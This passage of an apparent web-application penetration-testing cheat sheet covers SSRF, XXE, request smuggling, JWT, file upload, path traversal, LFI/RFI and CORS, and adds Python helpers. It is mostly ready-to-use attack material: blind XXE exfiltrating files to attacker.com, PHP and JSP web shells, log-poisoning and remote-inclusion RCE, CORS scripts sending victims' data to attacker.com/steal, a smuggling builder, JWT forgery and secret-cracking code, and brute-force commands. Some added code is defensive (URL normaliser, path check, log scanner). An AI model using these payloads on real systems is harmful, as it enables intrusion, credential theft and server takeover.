dict://127.0.0.1:6379/info (Redis)
gopher://127.0.0.1:6379/_INFO%0D%0A (Redis via Gopher)
ftp://127.0.0.1:21/
sftp://attacker.com:11111/
tftp://attacker.com/test
ldap://127.0.0.1:389/
http://127.0.0.1:8080/admin
http://127.0.0.1:8500/v1/kv/ (Consul)
http://127.0.0.1:5601 (Kibana)
http://127.0.0.1:9200/_cat/indices (Elasticsearch)
Bypass Techniques
// Decimal IP
http://2130706433/ (127.0.0.1)
// Octal IP
http://0177.0.0.1/
// Hex IP
http://0x7f000001/
// IPv6
http://[::ffff:127.0.0.1]/
// URL shortener (redirect)
http://bit.ly/ssrf-test → redirects to 127.0.0.1
// DNS rebinding / attacker-controlled DNS (e.g. a 1u.ms name that resolves to 127.0.0.1, or alternates between a public address and 127.0.0.1 to defeat resolve-then-fetch checks)
// Unicode / IDN dot
http://127。0.0.1/ (ideographic full stop U+3002, normalised to '.' by IDNA processing)
// Open redirect chained with SSRF
/redirect?url=http://169.254.169.254/
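Worked example (added here; not part of the original cheat sheet): a URL normaliser that folds every literal-address bypass above (decimal, octal, hex, IPv4-mapped IPv6, ideographic dot, userinfo and port) back to a canonical IP and checks it against loopback, private, link-local and metadata ranges. The `inet_aton`-style parser is written out rather than borrowed from `socket` because that function's acceptance of octal/hex forms is platform-dependent. The blocked networks are an assumption for the demo; the decoder and the caveat in `is_blocked` (a hostname must be resolved and re-checked, and the connection made to the checked address) are the point.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Code points that IDNA processing and browsers treat as a label separator.
SEPARATOR_DOTS = {0x3002: ".", 0xFF0E: ".", 0xFF61: "."}

BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16",            # link-local, including the metadata IP
    "0.0.0.0/8", "::1/128", "fc00::/7", "fe80::/10",
)]

def _parse_ipv4_part(part):
    # inet_aton rules: 0x.. is hex, a leading 0 is octal, otherwise decimal.
    if re.fullmatch(r"0[xX][0-9a-fA-F]*", part):
        return int(part[2:] or "0", 16)
    if re.fullmatch(r"0[0-7]*", part):
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part)
    raise ValueError(part)

def parse_ipv4_like(host):
    """Accept every form inet_aton does: 1 to 4 dot-separated parts, each
    decimal/octal/hex, the last part filling the remaining bytes.  So
    '2130706433', '0x7f000001', '0177.0.0.1' and '127.1' all give 127.0.0.1.
    Returns an IPv4Address, or None if `host` is not a numeric IPv4 form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_parse_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    *lead, last = values
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << (8 * (4 - len(lead)))) | last
    return ipaddress.IPv4Address(n)

def normalize_host(url):
    """Canonical IP string if the URL's host is an address literal in any
    encoding, otherwise the lower-cased hostname (which still needs resolving)."""
    host = (urlsplit(url).hostname or "").translate(SEPARATOR_DOTS).lower()
    ip = parse_ipv4_like(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)          # plain IPv6 (or IPv4) literal
        except ValueError:
            return host                              # a DNS name
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                          # [::ffff:127.0.0.1] -> 127.0.0.1
    return str(ip)

def is_blocked(url):
    """True when the URL literally names a blocked address.  False for a
    hostname is NOT a pass: resolve it, check every returned address against
    BLOCKED_NETS, and connect to that checked address only, or DNS rebinding,
    redirects and URL shorteners walk straight past this function."""
    try:
        ip = ipaddress.ip_address(normalize_host(url))
    except ValueError:
        return False
    return any(ip in net for net in BLOCKED_NETS)
```

Run your own bypass list through `normalize_host` before trusting a target's filter: if two spellings normalise to the same address here but one of them gets through the application, you have found the gap in its parser.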
Tools
Burp Suite + Collaborator, SSRFmap, Gopherus, interactsh
python3 ssrfmap.py -r request.txt -p url -m readfiles
gopherus --exploit redis # Generate gopher payload for Redis
Impact
- Internal network scanning
- Cloud credential theft
- Internal service exploitation
- RCE via metadata service
13
XML EXTERNAL ENTITY (XXE)
XML input processed with external entity references enabled, allowing file read and SSRF.
Where to Test
- XML POST requests
- SOAP endpoints
- File upload (docx/xlsx/svg)
- APIs accepting XML
- Content-Type: application/xml
Basic XXE Payloads
// File read
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
// Windows
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
// /etc/hosts
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Advanced XXE Payloads
SSRF via XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal-server/">]>
<root>&xxe;</root>
Blind XXE (Out-of-Band Exfil)
// Attacker hosts evil.dtd at http://attacker.com/evil.dtd (multi-line files such as /etc/passwd break the exfil URL; start with a one-line file like /etc/hostname):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;
// Payload sent to target:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">%xxe;]>
<foo>test</foo>
XXE via SVG Upload
// Upload as .svg file
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
XXE via DOCX/XLSX/PDF
// Unzip docx, edit word/document.xml, inject XXE, rezip
// OR inject into xl/workbook.xml for XLSX
Parameter Entity (when regular blocked)
<!DOCTYPE foo [
<!ENTITY % a "<!ENTITY b SYSTEM 'http://attacker.com/'>">
%a;
]>
<root>&b;</root>
Tools
Burp Suite, XXEinjector, Burp Collaborator
ruby XXEinjector.rb --host=attacker.com --path=/etc/passwd --file=req.txt
Impact
- Arbitrary file read
- SSRF / internal network access
- DoS (billion laughs)
- Data exfiltration
14
HTTP REQUEST SMUGGLING
Desync between front-end and back-end servers using conflicting Content-Length / Transfer-Encoding.
Detection Payloads
CL.TE (front-end honours Content-Length, back-end honours Transfer-Encoding)
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

1
A
X
// Front-end forwards only the 4 bytes "1\r\nA"; the back-end waits for the next chunk → timing delay
TE.CL (front-end honours Transfer-Encoding, back-end honours Content-Length)
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

X
// Front-end forwards only "0\r\n\r\n" (5 bytes); the back-end expects 6 and waits → timing delay
// Lines must end in CRLF. Probe CL.TE first: a TE.CL probe against a CL.TE stack can poison the connection for other users
TE.TE (Obfuscated Transfer-Encoding headers)
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
Exploit: Bypass Front-End Security Controls (CL.TE)
// Content-Length covers "0\r\n\r\n" plus the whole smuggled request: 119 bytes below with CRLF line endings; recompute it whenever the smuggled request changes
POST / HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
Transfer-Encoding: chunked

0

POST /admin HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
// The smuggled Content-Length (10) exceeds "x=1", so the first bytes of the next request on that connection are swallowed as the rest of its body
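Worked example (added here; not part of the original cheat sheet): builders for the two timing probes and for the CL.TE wrapper above, with `Content-Length` computed over the real CRLF-terminated bytes instead of counted by hand. The host and the smuggled `/admin` request are the section's own; `raw_request` and the helpers are assumptions for the demo. Sending is left out on purpose: these go through a raw socket or Burp Repeater with "Update Content-Length" switched off, never through a client library that rewrites framing headers.

```python
CRLF = "\r\n"

def raw_request(method, path, host, headers=(), body=""):
    """Serialise a request with CRLF line endings, as it goes on the wire."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"] + [f"{k}: {v}" for k, v in headers]
    return CRLF.join(lines) + CRLF + CRLF + body

def cl_te_probe(host):
    """CL.TE timing probe.  Content-Length: 4 makes a CL-first front-end
    forward only '1\\r\\nA'; a chunked-first back-end then waits for the
    next chunk."""
    body = "1" + CRLF + "A" + CRLF + "X"
    return raw_request("POST", "/", host,
                       [("Content-Length", "4"), ("Transfer-Encoding", "chunked")], body)

def te_cl_probe(host):
    """TE.CL timing probe.  A chunked-first front-end forwards only the
    5 bytes '0\\r\\n\\r\\n'; a CL-first back-end expecting 6 waits for the rest."""
    body = "0" + CRLF + CRLF + "X"
    return raw_request("POST", "/", host,
                       [("Content-Length", "6"), ("Transfer-Encoding", "chunked")], body)

def cl_te_smuggle(host, smuggled, content_type="application/x-www-form-urlencoded"):
    """Wrap a complete raw request so a CL-first front-end passes it through
    and a chunked-first back-end reads it as the start of the next request.
    Content-Length is computed over the actual bytes, the part that is easy
    to get wrong by hand."""
    body = "0" + CRLF + CRLF + smuggled
    headers = [("Content-Type", content_type),
               ("Content-Length", str(len(body.encode("latin-1")))),
               ("Transfer-Encoding", "chunked")]
    return raw_request("POST", "/", host, headers, body)

def content_length_of(request_text):
    """Read Content-Length back out of a serialised request (None if absent)."""
    head = request_text.split(CRLF + CRLF, 1)[0]
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            return int(value)
    return None

def body_of(request_text):
    return request_text.split(CRLF + CRLF, 1)[1]

def admin_smuggle(host="target.com"):
    """The section's example: smuggle a POST /admin behind a harmless POST /."""
    inner = raw_request("POST", "/admin", host,
                        [("Content-Type", "application/x-www-form-urlencoded"),
                         ("Content-Length", "10")], "x=1")
    return cl_te_smuggle(host, inner)

if __name__ == "__main__":
    print(admin_smuggle().replace(CRLF, "\\r\\n\n"))
```

Byte-exact framing is the whole attack: one stray LF-only line ending or a stale `Content-Length` turns a working desync into a 400 from the front-end.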
Tools
Burp HTTP Request Smuggler, smuggler.py, h2csmuggler
Impact
- Bypass security controls
- Session hijacking
- XSS delivery
- Cache poisoning
15
BROKEN AUTHENTICATION
Weaknesses in session management, credential handling, and authentication mechanisms.
Test Areas
- Login form
- Password reset
- Remember me
- Session tokens
- MFA bypass
- Account lockout
Testing Techniques & Payloads
Default Credentials
admin:admin
admin:password
admin:admin123
admin:123456
root:root
root:toor
guest:guest
test:test
user:user
administrator:administrator
Username Enumeration
// Observe response differences:
// - Timing differences
// - Different HTTP status codes
// - Different error messages
// Valid user: "Password is incorrect"
// Invalid user: "User does not exist"
// Brute force usernames:
admin, administrator, root, user, test, info, webmaster, support
Password Reset Flaws
// Host header injection in reset email:
POST /reset-password
Host: attacker.com ← inject here
// Predictable reset token
// Token in URL (Referer leak)
// Token not expiring
// Reuse of old tokens
Session Token Testing
// Collect multiple tokens and analyze entropy
// Test if token is base64/JWT/sequential
// Test session fixation:
// 1. Get session ID before login
// 2. Log in
// 3. Check if session ID changed (if not → fixation vuln)
// Test session termination:
// After logout, use old session token - does it still work?
MFA Bypass
// Response manipulation: change "success":false to "success":true
// Code brute force: try 000000-999999 (if no rate limit)
// Use backup codes
// Skip MFA step entirely by going directly to post-auth URL
// Response body tamper after MFA check
Tools
Burp Suite Intruder, Hydra, Medusa, Patator
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Impact
- Account takeover
- Privilege escalation
- Full application compromise
16
INSECURE DIRECT OBJECT REFERENCE (IDOR)
Accessing or modifying resources by guessing/changing object identifiers without authorization checks.
Where to Test
- User IDs in URLs
- Order IDs
- File names
- API endpoints
- Account numbers
- Document IDs
Detection & Exploitation
// Numeric ID manipulation
GET /api/user/1001 → change to /api/user/1000
GET /invoice?id=5432 → change to /invoice?id=5431
DELETE /api/post/99 → try another user's post ID
// UUID/GUID (harder but possible)
GET /api/orders/a4b12c3d-... → find other UUIDs via leakage
// Parameter pollution
GET /api/profile?userId=1001&userId=1000
// HTTP method switching
POST /api/user/1001 → PUT /api/user/1000
// Encoded IDs
base64: dXNlcjoxMDAx → decode → user:1001 → change to user:1000 → encode
// Mass assignment / JSON parameter abuse
{"id": 1001} → change to {"id": 1000}
{"userId": "me"} → change to {"userId": "admin"}
IDOR Types
Types to Test
Horizontal IDOR: Access another user's same-level resource
Vertical IDOR: Access higher-privilege resource (admin panel)
Blind IDOR: No direct response, but data modified
Reference in body: JSON/XML body parameter
Reference in cookie: Session or user tracking cookie
Tools
Burp Suite (Authorize extension), AuthMatrix
Impact
- Unauthorized data access
- Account takeover
- Data modification/deletion
17
JWT VULNERABILITIES
Exploiting weak JWT implementations: algorithm confusion, none algorithm, weak secrets.
JWT Structure
Format: header.payload.signature (each part base64url encoded, no '=' padding)
Decode: echo "eyJ..." | base64 -d   (if base64 reports invalid input, append "=" padding or use a base64url-aware tool)
Attack Techniques
1. None Algorithm Attack
// Modify header to:
{"alg": "none", "typ": "JWT"}
// Remove signature (trailing dot remains)
// eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
2. Weak Secret Brute Force
hashcat -a 0 -m 16500 jwt_token.txt wordlist.txt
john --wordlist=wordlist.txt --format=HMAC-SHA256 jwt.txt
# Common weak secrets: secret, password, 123456, jwt_secret
3. RS256 to HS256 Algorithm Confusion
// If server uses RS256, get public key (often exposed)
// Sign JWT with public key using HS256
// Server may verify HS256 using the public key as secret
// Tools: jwt_tool, portswigger jwt editor
4. JWK Header Injection
// Modify header to include your own public key:
{
"alg": "RS256",
"jwk": {
"kty": "RSA",
"e": "AQAB",
"n": "attacker-public-key-n..."
}
}
// Sign with corresponding private key
5. Kid Parameter Injection
// kid = key ID used to select signing key
// Inject SQL into kid:
{"kid": "' UNION SELECT 'attacker_secret' --"}
// Or path traversal:
{"kid": "../../dev/null"} // sign with empty key
6. Claim Manipulation
// Decode → modify claims → re-sign (if secret known)
{"sub": "user123"} → {"sub": "admin"}
{"role": "user"} → {"role": "admin"}
{"exp": 1700000000} → {"exp": 9999999999} // never expires
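Worked example (added here; not part of the original cheat sheet) for attacks 1, 2 and 6 above: a stdlib-only HS256 signer, the `alg: none` forgery with its trailing dot, a verifier that trusts the header's `alg` (the bug) beside one that pins the algorithm (the fix), and a dictionary attack on the signature. The application, its secret and the claims are assumptions for the demo; the padding-aware decoder is why the page's `base64 -d` one-liner sometimes needs `=` appended. RS256 to HS256 confusion is the same header-trust bug with the RSA public key as the HMAC secret, so it is described in a comment rather than re-implemented.

```python
import base64
import hashlib
import hmac
import json

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s):
    # JWT segments drop the '=' padding; plain `base64 -d` chokes on that.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _json_segment(obj):
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())

def decode_unverified(token):
    """Header and payload as dicts, ignoring the signature (what jwt.io shows)."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))

def sign_hs256(header, payload, secret):
    signing_input = _json_segment(header) + "." + _json_segment(payload)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def demo_token(secret=b"jwt_secret"):
    """A legitimate token as the (assumed) application would issue it."""
    return sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "user123", "role": "user"}, secret)

def forge_none(payload):
    """Attack 1: alg=none, signature segment empty, trailing dot kept."""
    return _json_segment({"alg": "none", "typ": "JWT"}) + "." + _json_segment(payload) + "."

def verify_vulnerable(token, secret):
    """Trusts the header's `alg`.  This is the root cause of the none attack
    and of RS256->HS256 confusion: a server that loads its RSA public key and
    passes it to whichever branch the header selects would accept an HS256
    token signed with that public key."""
    header, payload = decode_unverified(token)
    h, p, s = token.split(".")
    if header.get("alg") == "none":
        return payload                                   # nothing checked at all
    if header.get("alg") == "HS256":
        expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return payload
    return None

def verify_fixed(token, secret):
    """The fix: the algorithm is pinned server-side; the header's `alg` is ignored."""
    h, p, s = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))

def crack_secret(token, wordlist):
    """Attack 2 in miniature: offline dictionary attack on an HS256 signature
    (hashcat -m 16500 does the same at GPU speed)."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for word in wordlist:
        candidate = hmac.new(word.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(candidate, target):
            return word
    return None
```

Once `crack_secret` (or hashcat) returns the secret, attack 6 is just `sign_hs256` with edited claims; the token will pass even the fixed verifier, which is why a strong random secret matters as much as pinning the algorithm.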
Tools
jwt_tool, Burp JWT Editor, hashcat, jwt.io
python3 jwt_tool.py -t https://target.com -rh "Authorization: Bearer JWT" -M at
python3 jwt_tool.py JWT -X a # None algorithm attack
python3 jwt_tool.py JWT -C -d wordlist.txt # Crack secret
Impact
- Authentication bypass
- Privilege escalation
- Account takeover
18
OAUTH 2.0 FLAWS
Misconfigured OAuth flows leading to account takeover via token/code theft.
Common Vulnerabilities
// 1. Open redirect in redirect_uri
/oauth/authorize?client_id=X&redirect_uri=https://attacker.com/callback
// 2. State parameter missing (CSRF on OAuth)
// No state= parameter → forge auth request → steal code
// 3. Authorization code interception
// Referrer header leaks code to third-party resources on callback page
// 4. Token leakage in browser history (implicit flow)
// Token in URL fragment → logged in browser history
// 5. Scope escalation
// Request: scope=email
// Replay with: scope=email%20profile%20admin
// 6. PKCE bypass
// code_challenge_method=plain → weak protection
// 7. Account linking abuse
// Link attacker-controlled email to victim account via OAuth
// 8. JWT none algorithm in ID token
// See JWT section
Tools
Burp Suite, OAuth 2.0 tester
19
FILE UPLOAD VULNERABILITIES
Uploading malicious files (webshells) to achieve RCE on the server.
Attack Vectors
Web Shell Payloads
// PHP Web Shell
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_REQUEST['cmd']); ?>
<?php passthru($_GET['c']); ?>
<?php eval($_POST['code']); ?>
// ASP Web Shell
<% eval request("cmd") %>
// JSP Web Shell
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
// Simple PHP shell as image
// Prepend GIF header, save as shell.php:
GIF89a;<?php system($_GET['cmd']); ?>
Extension Bypass Techniques
// Double extension
shell.php.jpg
shell.jpg.php
// Null byte (old servers)
shell.php%00.jpg
shell.php\0.jpg
// Case variation
shell.pHp
shell.PHP
shell.PhP
// Less common extensions (check server config)
shell.php3
shell.php4
shell.php5
shell.phtml
shell.phar
shell.shtml
shell.shtm
// Alternative extension with .htaccess trick:
// Upload .htaccess with: AddType application/x-httpd-php .jpg
// Then upload shell.jpg
Content-Type Bypass
// Change MIME type in request:
Content-Type: image/jpeg ← even if file is PHP
Content-Type: image/gif
Content-Type: image/png
// Add magic bytes to PHP shell:
GIF89a; <?php system($_GET['cmd']); ?>
// Or JPEG magic: \xff\xd8\xff\xe0 then PHP code
SVG/XML XSS via Upload
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg"
onload="alert(document.cookie)">
<circle cx="50" cy="50" r="50"/>
</svg>
Path Traversal in Filename
// Filename in upload:
../../../var/www/html/shell.php
..%2F..%2Fshell.php
....//shell.php
Testing Method
Steps
1. Upload .php file → observe if blocked (check extension, MIME, magic bytes)
2. Bypass extension checks (see above)
3. Bypass MIME type checks (modify Content-Type)
4. Find the upload directory (robots.txt, forced browsing)
5. Request uploaded file to trigger execution
Tools
Burp Suite, weevely, extension fuzz lists
Impact
- Remote Code Execution
- Full server takeover
- Data exfiltration
- Malware hosting
20
PATH TRAVERSAL / DIRECTORY TRAVERSAL
Reading arbitrary files outside web root using ../ sequences in file parameters.
Where to Test
- File download params
- Image display params
- Template includes
- Language files
- PDF generation
Payloads
// Basic
../../../etc/passwd
../../etc/passwd
../etc/passwd
// URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
// Double URL encoded
..%252F..%252F..%252Fetc%252Fpasswd
// Unicode / UTF-8
..%c0%af..%c0%afetc%c0%afpasswd
..%ef%bc%8f..%ef%bc%8fetc%ef%bc%8fpasswd
// Null byte (old PHP)
../../../etc/passwd%00.jpg
// Windows
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
%WINDIR%\win.ini
// With prefix bypass (if app adds prefix)
....//....//....//etc/passwd
....\/....\/etc/passwd
// Absolute path
/etc/passwd
C:\windows\win.ini
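The defensive counterpart to the payload list above, as an added example (not from the original page): decode fully, canonicalise, then check containment, rather than stripping `../`. The base directory is a constructed value and a POSIX filesystem is assumed. Note that the `....//` prefix-bypass payloads do not escape a canonicalising check at all; they only defeat naive stripping, so here they resolve to a harmless non-existent name inside the base.

```python
import os
from urllib.parse import unquote

def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding (..%252F -> ..%2F -> ../) until it stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def safe_path(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or raise ValueError."""
    base = os.path.normpath(os.path.abspath(base_dir))
    decoded = decode_fully(user_path)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    # Overlong UTF-8 (%c0%af) decodes to U+FFFD and the fullwidth solidus (%ef%bc%8f)
    # is not a separator for os.path, but a layer that normalises Unicode might
    # treat them as '/', so this policy refuses anything outside ASCII after decoding.
    if any(ord(c) > 127 for c in decoded):
        raise ValueError("non-ASCII path after decoding")
    # Treat backslash as a separator too, so ..\..\ cannot hide from the check.
    decoded = decoded.replace("\\", "/")
    # os.path.join lets an absolute input (/etc/passwd) replace the base entirely;
    # the containment check below is what catches that, not the join.
    resolved = os.path.normpath(os.path.join(base, decoded))
    if os.path.commonpath([base, resolved]) != base:
        raise ValueError("path escapes base directory: " + user_path)
    return resolved

def escapes(base_dir, user_path):
    """True when safe_path refuses user_path; convenient for checking a payload list."""
    try:
        safe_path(base_dir, user_path)
    except ValueError:
        return True
    return False
```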
Common Target Files
// Linux
/etc/passwd
/etc/shadow
/etc/hosts
/etc/issue
/proc/self/environ
/proc/self/cmdline
/proc/net/tcp
/var/log/apache2/access.log (LFI to RCE via log poisoning)
/var/log/nginx/access.log
~/.ssh/id_rsa
~/.bash_history
/var/www/html/config.php
// Windows
C:\windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\windows\system32\drivers\etc\hosts
Tools
dotdotpwn, Burp Suite, ffuf
dotdotpwn -m http -h target.com -f /etc/passwd -k "root:"
Impact
- Read server configuration
- SSH private key theft
- Source code disclosure
- Credential exposure
References
21
LOCAL / REMOTE FILE INCLUSION (LFI / RFI)
Including local or remote files in server-side code execution, often leading to RCE.
Detection
// Look for params like:
?page=home
?file=index
?template=main
?include=header
?lang=en
// Test with:
?page=../../../etc/passwd
?file=../../../../etc/hosts
LFI Payloads
// Basic
?page=../../../etc/passwd
?file=../../../../etc/shadow
// PHP Wrappers
?page=php://filter/convert.base64-encode/resource=index.php // Read PHP source
?page=php://filter/read=string.rot13/resource=index.php
?page=php://input // with POST: <?php system('id');?>
?page=data://text/plain,<?php system('id');?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+Cg==
?page=phar://./upload/evil.zip/shell // PHAR deserialization
// Null byte bypass (PHP < 5.3)
?page=../../../etc/passwd%00
?page=../../../etc/passwd%00.php
LFI to RCE
// Log Poisoning - inject PHP code in User-Agent:
User-Agent: <?php system($_GET['cmd']); ?>
// Then include:
?page=../../../var/log/apache2/access.log&cmd=id
// Proc environ injection:
?page=/proc/self/environ // If env vars user-controlled
// Session file:
?page=/var/lib/php/sessions/sess_[your_session_id]
// Set session var to: <?php system($_GET['cmd']); ?>
RFI Payloads
// requires: allow_url_include=On (PHP)
?page=http://attacker.com/shell.txt
?page=http://attacker.com/shell.php
?page=ftp://attacker.com/shell.txt
?page=//attacker.com/shell.txt (SMB)
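Detection logic for the LFI, wrapper, RFI and log-poisoning patterns in the three lists above, run over constructed Apache combined-format log lines; this is an added example, not part of the original page. The log lines, regexes and tag names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format lines; 10.0.0.9 is the noisy client.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1834 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9000 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 200 1834 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=http://attacker.com/shell.txt HTTP/1.1" 500 0 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
WRAPPER_RE = re.compile(r"^(?:php|phar|data|expect|zip|glob|compress\.\w+):", re.I)
REMOTE_RE = re.compile(r"^(?:https?:|ftps?:|//|\\\\)", re.I)

def classify_value(value):
    """Tag one decoded parameter value with the inclusion techniques it resembles."""
    v = unquote(value)                      # parse_qsl decoded once; catch double encoding
    tags = set()
    if "\x00" in v:
        tags.add("null-byte")
    if re.search(r"\.\.[\\/]", v):          # also matches ....// and ..\..\ variants
        tags.add("traversal")
    if v.startswith(("/etc/", "/proc/", "/var/log/")):
        tags.add("absolute-path")
    if WRAPPER_RE.match(v):
        tags.add("php-wrapper")
    if REMOTE_RE.match(v):
        tags.add("remote-include")
    if "<?php" in v.lower() or "<?=" in v:
        tags.add("php-tag")
    return tags

def scan_log(text):
    """Return (client, location, tags) for every suspicious parameter or User-Agent."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, _status, user_agent = m.groups()
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            tags = classify_value(value)
            if tags:
                hits.append((client, name, sorted(tags)))
        # Log poisoning plants PHP in a header that ends up in this very file.
        if "<?php" in user_agent.lower() or "<?=" in user_agent:
            hits.append((client, "User-Agent", ["php-tag"]))
    return hits
```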
Tools
LFISuite, liffy, Burp Suite, ffuf
Impact
- Source code disclosure
- Credential theft
- RCE via log poisoning
References
22
CORS MISCONFIGURATION
Overly permissive CORS headers allowing malicious sites to read cross-origin responses.
Detection
// Send request with Origin header, check response:
Origin: https://attacker.com
// Vulnerable response:
Access-Control-Allow-Origin: https://attacker.com
Access-Control-Allow-Credentials: true
// Test origins:
Origin: https://attacker.com
Origin: null
Origin: https://target.com.attacker.com
Origin: https://attacker.target.com
Exploitation PoC
// Host on attacker.com:
<script>
var req = new XMLHttpRequest();
req.onload = function() {
// Exfil response data
fetch('https://attacker.com/steal?data=' + btoa(this.responseText));
}
req.open('GET','https://target.com/api/user',true);
req.withCredentials = true;
req.send();
</script>
// Fetch API PoC
<script>
fetch('https://target.com/api/profile', {credentials: 'include'})
.then(r => r.text())
.then(data => fetch('https://attacker.com/steal?d='+btoa(data)));
</script>
CORS Bypass Techniques
// Origin: null (for sandboxed iframes)
<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
src="data:text/html,<script>var req=new XMLHttpRequest();
req.open('GET','https://target.com/api/',true);
req.withCredentials=true;
req.onload=()=>location='https://attacker.com/?d='+req.responseText;
req.send();</script>">
</iframe>
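The origin check that makes the test origins above fail, next to the substring-matching pattern they are designed to defeat, as an added example that is not from the original page. The allowlist is constructed; `target.com` is the page's placeholder for the site being protected.

```python
from urllib.parse import urlsplit

# Constructed allowlist: the only origins that may read credentialed responses.
ALLOWED_ORIGINS = {"https://target.com", "https://app.target.com"}

def weak_origin_check(origin):
    """The pattern behind the bypass list above: substring match plus 'null' reflection."""
    if origin is None:
        return None
    if origin == "null" or "target.com" in origin:
        return origin                      # reflects whatever the client sent
    return None

def strict_origin_check(origin):
    """Exact match against the allowlist after light normalisation; never 'null'."""
    if not origin or origin == "null":
        return None
    parts = urlsplit(origin)
    # An Origin is scheme://host[:port] only; userinfo, paths or queries mean tampering.
    if parts.scheme != "https" or parts.path or parts.query or parts.fragment:
        return None
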